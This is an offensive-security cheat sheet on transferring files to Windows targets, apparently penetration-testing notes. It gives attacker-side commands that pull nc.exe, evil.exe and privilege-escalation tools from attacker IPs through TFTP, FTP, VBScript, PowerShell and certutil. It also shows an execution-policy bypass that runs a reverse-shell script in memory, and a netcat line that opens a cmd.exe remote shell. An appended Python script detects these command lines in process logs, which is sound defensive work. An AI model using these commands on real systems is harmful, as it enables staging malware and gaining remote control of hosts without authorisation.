# Windows File Transfer

## **simple webserver** <a href="#id-0-simple-webserver" id="id-0-simple-webserver"></a>

***

#### | python 2.7 <a href="#python-27" id="python-27"></a>

```
python2 -m SimpleHTTPServer
```

#### | python3 <a href="#python3" id="python3"></a>

```
python3 -m http.server
```

#### | ruby <a href="#ruby" id="ruby"></a>

```
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
```

#### | php <a href="#php" id="php"></a>

```
php -S 0.0.0.0:8888
```


## **Smbserver (impacket)** <a href="#id-1-smbsever-impacket" id="id-1-smbsever-impacket"></a>

***

impacket-smbserver

```
copy \\<ip>\<path>\<file>       # Linux to Windows
copy <file> \\<ip>\<path>\      # Windows to Linux
```

#### | **kali:** <a href="#kali" id="kali"></a>

```
smbserver.py myshare /tmp/smbshare -smb2support
```

#### | **windows:** <a href="#windows" id="windows"></a>

```
net use M: \\<kali-ip>\myshare
```

```
\\10.10.10.1\myshare\privesc.exe whoami
```

## **TFTP** <a href="#id-2-tftp" id="id-2-tftp"></a>

#### | **hacker** <a href="#hacker" id="hacker"></a>

```
root@kali: mkdir /tftp
root@kali: atftpd --daemon --port 69 /tftp
root@kali: cp nc.exe /tftp
```

#### | **target** <a href="#target" id="target"></a>

```
C:\Program Files\SLmail\System> tftp -i 192.168.30.5 GET nc.exe
```


## **FTP** <a href="#id-3-ftp" id="id-3-ftp"></a>

***

#### | **hacker** <a href="#hacker" id="hacker"></a>

```
root@kali: apt-get install pure-ftpd
root@kali: cat setup-ftp
root@kali: ./setup-ftp
```

```
root@kali: cat ftp.commands
echo open 192.168.58.5 21 > ftp.txt
echo offsec>> ftp.txt
echo lab>> ftp.txt
echo bin>> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt 
```

## **SCP** <a href="#id-4-scp" id="id-4-scp"></a>

***

```
scp <fileToUpload> user@remote:/path
```

### VBScript <a href="#vbscript" id="vbscript"></a>

Here is a good script to make a wget-clone in VB.

If it doesn't work, try piping it through unix2dos before copying it.

```
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```

You then execute the script like this:

```
cscript wget.vbs http://192.168.10.5/evil.exe evil.exe
```

## PowerShell <a href="#id-5-vbscript" id="id-5-vbscript"></a>

***

#### | **Download File to path** <a href="#download-file-to-path" id="download-file-to-path"></a>

```
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://10.10.14.5/JuicyPotato.exe','C:\users\merlin\documents\potato.exe')"
```

```
echo IEX(New-Object System.Net.WebClient).downloadFile('http://10.10.10.3:8000/loli.txt','C:\Users\pelado\Desktop\loli.txt') | powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile
```

#### | **Download a test file and execute it in memory** <a href="#download-testfile-and-executes-it-in-the-memory" id="download-testfile-and-executes-it-in-the-memory"></a>

```
powershell.exe  -nop -ep bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6/Invoke-PowerShellTcp.ps1')"
```

#### | **powershell full path:** <a href="#powershell-full-path" id="powershell-full-path"></a>

```
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe
```

#### | **powershell wget** <a href="#powershell-wget" id="powershell-wget"></a>

```
powershell wget "http://10.10.10.10/nc.exe" -outfile "nc.exe"
nc.exe -e cmd.exe 10.10.10.10 4444
```

### wget.ps1 <a href="#wgetpsl" id="wgetpsl"></a>

#### | **kali** <a href="#kali" id="kali"></a>

```
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://10.10.14.23:8000/PowerUp.ps1" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
```

#### | **target:** <a href="#target-3" id="target-3"></a>

```
C:\programs> (copy and paste the block above)
C:\programs> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
C:\programs> dir new-exploit.exe
 cool
```

## netcat

```
nc -lvp 1234 > <out_file>
nc <ip> 1234 < <in_file>
```

## curl

```
curl <url> -o outfile
```

## **certutil** <a href="#id-7-certutils" id="id-7-certutils"></a>

***

#### | **windows** <a href="#windows" id="windows"></a>

```
certutil.exe -urlcache -split -f "http://ip-addr:port/file" [output-file]
```
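
The Windows-side commands on this page each leave a recognisable process command line. The following is an added example, not part of the original page: a small matcher that flags those command lines in process-creation logs. It assumes the logs (for example Windows event 4688 with command-line auditing, or Sysmon event ID 1) have already been exported as `(host, command line)` pairs; the rule names, host names and sample events are constructed for illustration.

```python
import re

# One rule per Windows-side transfer command shown on this page (rule names are made up).
RULES = [
    ("certutil-urlcache",
     re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*\bhttps?://", re.I)),
    ("powershell-webclient",
     re.compile(r"\bpowershell(\.exe)?\b.*\bnet\.webclient\b.*\.download(file|string)\b", re.I)),
    ("powershell-wget",
     re.compile(r"\bpowershell(\.exe)?\b.*\b(wget|iwr|invoke-webrequest)\b.*\bhttps?://", re.I)),
    ("tftp-get", re.compile(r"\btftp(\.exe)?\b.*\s-i\s.*\bget\b", re.I)),
    ("ftp-script", re.compile(r"\bftp(\.exe)?\s+.*-s:\S+", re.I)),
    ("cscript-url", re.compile(r"\b[cw]script(\.exe)?\b.*\.vbs\b.*\bhttps?://", re.I)),
]

def classify(command_line):
    """Return the name of every rule that the command line matches."""
    return [name for name, rx in RULES if rx.search(command_line)]

def scan(events):
    """events: iterable of (host, command_line). Returns (host, rule, command_line) hits."""
    hits = []
    for host, cmd in events:
        for rule in classify(cmd):
            hits.append((host, rule, cmd))
    return hits

# Constructed sample events: six transfer commands in the forms used on this page,
# followed by two benign administrative commands that must not be flagged.
SAMPLE_EVENTS = [
    ("WS01", 'certutil.exe -urlcache -split -f "http://10.10.10.10/file" out.bin'),
    ("WS01", "powershell.exe -nop -ep bypass -c \"IEX(New-Object Net.WebClient)"
             ".downloadString('http://10.10.14.6/Invoke-PowerShellTcp.ps1')\""),
    ("WS02", 'powershell wget "http://10.10.10.10/nc.exe" -outfile "nc.exe"'),
    ("WS02", "tftp -i 192.168.30.5 GET nc.exe"),
    ("WS03", "ftp -s:ftp.txt"),
    ("WS03", "cscript wget.vbs http://192.168.10.5/evil.exe evil.exe"),
    ("WS04", r"certutil -hashfile C:\temp\a.bin SHA256"),
    ("WS04", r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for host, rule, cmd in scan(SAMPLE_EVENTS):
        print(f"{host}  {rule:22}  {cmd}")
```

String matching like this is easy to evade with quoting or encoding tricks, so treat hits as triage leads and pair them with network telemetry for outbound HTTP, TFTP, FTP and SMB from workstations.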
